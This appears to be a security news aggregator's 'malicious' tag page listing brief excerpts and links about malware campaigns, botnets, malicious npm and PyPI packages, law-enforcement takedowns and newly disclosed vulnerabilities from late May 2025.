Tag: malicious
-
Malicious PyPI packages exploit ML models to deploy infostealer
First seen on scworld.com Jump to article: www.scworld.com/brief/malicious-pypi-packages-exploit-ml-models-to-deploy-infostealer
-
New PumaBot botnet brute forces SSH credentials to breach devices
A newly discovered Go-based Linux botnet malware named PumaBot is brute-forcing SSH credentials on embedded IoT devices to deploy malicious payloads. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/new-pumabot-botnet-brute-forces-ssh-credentials-to-breach-devices/
-
Czech Republic Blames China-Linked APT31 Hackers for 2022 Cyberattack
The Czech Republic on Wednesday formally accused a threat actor associated with the People’s Republic of China (PRC) of targeting its Ministry of Foreign Affairs.In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The…
-
Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for… First seen on hackread.com Jump to article: hackread.com/fake-ai-video-tool-ads-facebook-linkedin-infostealers/
-
Worldwide Operation Shuts Down Hundreds of Ransomware Servers and Domains, Ending Key Attack Infrastructure
Law enforcement and judicial officials, working together with Europol and Eurojust, have dealt a devastating blow to the worldwide ransomware ecosystem in a historic international operation. From May 19 to 22, 2025, Operation Endgame targeted the critical infrastructure behind ransomware attacks, dismantling approximately 300 servers and neutralizing 650 malicious domains worldwide. This operation not only…
-
Apple Blocked 2 million Malicious App $9 Billion in Fraudulent Transactions
Apple has strengthened the App Store as a bulwark of confidence, a remarkable testament to its commitment to customer safety. According to the company’s annual fraud analysis, over the past five years, Apple has thwarted more than $9 billion in fraudulent transactions, with a staggering $2 billion prevented in 2024 alone. This achievement underscores Apple’s…
-
Fake Bitdefender Site Spreads Trio of Malware Tools
A spoofed Bitdefender site has been used in a malicious campaign distributing VenomRAT and other malware, according to DomainTools First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/fake-bitdefender-site-spreads/
-
Threat Actors Weaponize Fake AI-Themed Websites to Deliver Python-based infostealers
Mandiant Threat Defense has uncovered a malicious campaign orchestrated by the threat group UNC6032, which capitalizes on the global fascination with artificial intelligence (AI). Since at least mid-2024, UNC6032 has been deploying fake AI video generator websites to distribute malware, specifically targeting users through deceptive social media ads on platforms like Facebook and LinkedIn. These…
-
251 Malicious IPs Target Cloud-Based Device Exploiting 75 Exposure Points
On May 8, 2025, cybersecurity researchers at GreyNoise detected a highly orchestrated scanning operation targeting 75 known exposure points across the internet in just 24 hours. The campaign, executed by 251 malicious IP addresses”, all geolocated to Japan and hosted on Amazon Web Services (AWS)”, triggered a diverse array of 75 distinct behaviors, including exploitation…
-
VenomRAT Malware Introduces New Tools for Password Theft and Stealthy Access
A malicious cyber campaign leveraging VenomRAT, a potent Remote Access Trojan (RAT), has been uncovered, posing a significant threat to unsuspecting users through a deceptive website mimicking Bitdefender’s Antivirus for Windows download page. The fraudulent domain, “bitdefender-download[.]com,” lures victims with a spoofed interface titled “DOWNLOAD FOR WINDOWS,” closely resembling the legitimate site but with subtle…
-
SilentWerewolf Attack Combines Legitimate Tools with Code Obfuscation for Stealthy Infiltration
The threat actor dubbed SilentWerewolf has employed advanced phishing techniques to infiltrate organizations in Russia and Moldova, focusing on critical sectors such as nuclear energy, aircraft, and mechanical engineering. Starting on March 11, the first campaign used spearphishing emails with malicious links to distribute ZIP archives containing a novel C# loader disguised as legal documents.…
-
Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
Researchers found a fake Bitdefender site spreading the Venom RAT by tricking users into downloading it as antivirus software. DomainTools Intelligence (DTI) researchers warn of a malicious campaign using a fake website (“bitdefender-download[.]com”) spoofing Bitdefender’s Antivirus for Windows download page to trick visitors into downloading a remote access trojan called Venom RAT. >>A malicious campaign…
-
251 Amazon-Hosted IPs Used in Exploit Scan Targeting ColdFusion, Struts, and Elasticsearch
Cybersecurity researchers have disclosed details of a coordinated cloud-based scanning activity that targeted 75 distinct “exposure points” earlier this month.The activity, observed by GreyNoise on May 8, 2025, involved as many as 251 malicious IP addresses that are all geolocated to Japan and hosted by Amazon.”These IPs triggered 75 distinct behaviors, including CVE exploits, First…
-
Patched GitLab Duo Flaws Risked Code Leak, Malicious Content
Prompt Injection, HTML Output Rendering Could Be Used for Exploit. Hackers can exploit vulnerabilities in a generative artificial intelligence assistant integrated across GitLab’s DevSecOps platform to manipulate the model’s output, exfiltrate source code and potentially deliver malicious content through the platform’s user interface. First seen on govinfosecurity.com Jump to article: www.govinfosecurity.com/patched-gitlab-duo-flaws-risked-code-leak-malicious-content-a-28499
-
Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
Tags: access, antivirus, credentials, crypto, cybercrime, cybersecurity, finance, malicious, rat, softwareCybersecurity researchers have disclosed a new malicious campaign that uses a fake website advertising antivirus software from Bitdefender to dupe victims into downloading a remote access trojan called Venom RAT.The campaign indicates a “clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems,” the…
-
US authorities charge 16 in operation to disrupt DanaBot malware
Authorities said malware linked to Russia-based cybercrime group infected more than 300,000 computers around the world with the malicious code. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/us-authorities-disrupt-danabot-malware/748991/
-
GitLab Vulnerability ‘Highlights the Double-Edged Nature of AI Assistants’
A remote prompt injection flaw in GitLab Duo allowed attackers to steal private source code and inject malicious HTML. GitLab has since patched the issue. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-gitlab-duo-vulnerability-hidden-prompts/
-
Malicious Machine Learning Model Attack Discovered on PyPI
A novel attack exploited machine learning models on PyPI, using zipped Pickle files to deliver infostealer malware First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/malicious-machine-learning-model/
-
GitLab ‘Vulnerability Highlights the Double-Edged Nature of AI Assistants’
A remote prompt injection flaw in GitLab Duo allowed attackers to steal private source code and inject malicious HTML. GitLab has since patched the issue. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-gitlab-duo-vulnerability-hidden-prompts/
-
Hackers drop 60 npm bombs in less than two weeks to recon dev machines
Tags: attack, data, detection, email, framework, hacker, malicious, open-source, rce, remote-code-execution, supply-chain, threat, toolThe accounts are now defunct: The first three malicious packages, “e-learning-garena,” “seatalk-rn-leave-calendar,” and “coral-web-be,” were released under the npm accounts bbbb335656, cdsfdfafd1232436437, and sdsds656565, respectively. Since then, all three accounts have gone on to publish twenty malicious packages each.According to Socket, the first package emerged eleven days ago, and the most recent appeared only hours…
-
AI, Quantum and the Evolving Threat Landscape: Key Findings from the Thales 2025 Data Threat Report
Tags: ai, api, attack, authentication, awareness, breach, cloud, compliance, computing, control, crypto, cryptography, data, encryption, guide, malicious, malware, mfa, nist, passkey, phishing, privacy, programming, ransomware, regulation, risk, software, strategy, threat, tool, vulnerabilityAI, Quantum and the Evolving Threat Landscape: Key Findings from the Thales 2025 Data Threat Report madhav Tue, 05/27/2025 – 04:40 The Thales 2025 Data Threat Report reveals a critical inflection point in global cybersecurity. As the threat landscape grows more complex and hostile, the rapid adoption of generative AI is amplifying both opportunity and…
-
GIMP Image Editor Vulnerability Allows Remote Attackers to Execute Arbitrary Code
Two major security vulnerabilities have been found in the widely used GIMP image editing software, potentially allowing remote attackers to execute arbitrary code on affected systems, according to security researchers. The vulnerabilities, labeled CVE-2025-2760 and CVE-2025-2761, each have a high CVSS score of 7.8 and impact users who open malicious image files or visit compromised…
-
Silver RAT Malware Employs New Anti-Virus Bypass Techniques to Execute Malicious Activities
A newly identified strain of malware, dubbed Silver RAT, has emerged as a significant threat to cybersecurity, leveraging sophisticated anti-virus bypass techniques to infiltrate and compromise Windows-based systems. This remote access trojan (RAT), believed to be crafted by a highly skilled threat actor or group, demonstrates an alarming ability to evade detection by traditional security…
-
Hackers Exploit HTTP/2 Flaw to Launch Arbitrary Cross-Site Scripting Attacks
A groundbreaking study from Tsinghua University and Zhongguancun Laboratory has uncovered critical vulnerabilities in modern web infrastructure, revealing that HTTP/2 server push and Signed HTTP Exchange (SXG) features can be exploited to bypass the Same-Origin Policy (SOP)”, a cornerstone of web security. The SOP is designed to prevent malicious scripts on one website from accessing…
-
60 Malicious npm Packages Exfiltrate Hostnames, IP Addresses, and DNS Server Details
A Socket’s Threat Research Team has revealed a sophisticated and ongoing campaign targeting the npm ecosystem, involving 60 malicious packages published under three distinct accounts: bbbb335656, cdsfdfafd49Group2436437, and sdsds656565. First detected just eleven days ago, with the latest package appearing mere hours before this report, these packages embed a covert script that activates during the…
-
Over 70 Malicious npm and VS Code Packages Found Stealing Data and Crypto
As many as 60 malicious npm packages have been discovered in the package registry with malicious functionality to harvest hostnames, IP addresses, DNS servers, and user directories to a Discord-controlled endpoint.The packages, published under three different accounts, come with an install”‘time script that’s triggered during npm install, Socket security researcher Kirill Boychenko said in a…
-
Over 40 Malicious Chrome Extensions Impersonate Popular Brands to Steal Sensitive Data
Tags: browser, chrome, cyber, cybersecurity, data, google, intelligence, malicious, phishing, tacticsCybersecurity firm LayerX has uncovered over 40 malicious Chrome browser extensions, many of which are still available on the Google Chrome Web Store. These extensions, part of three distinct phishing campaigns, were designed to impersonate well-known and trusted applications and brands. Detailed Analysis Reveals Impersonation Tactics LayerX, building off initial research by the DomainTools Intelligence…
-
Bitwarden Flaw Allows Upload of Malicious PDFs, Posing Security Risk
A serious security vulnerability has been identified in Bitwarden, the popular password management platform, affecting versions up to 2.25.1. The flaw, designated CVE-2025-5138, allows attackers to execute cross-site scripting (XSS) attacks through malicious PDF files uploaded to the platform’s file handling system. Vulnerability Details and Technical Analysis The vulnerability stems from insufficient file type restrictions…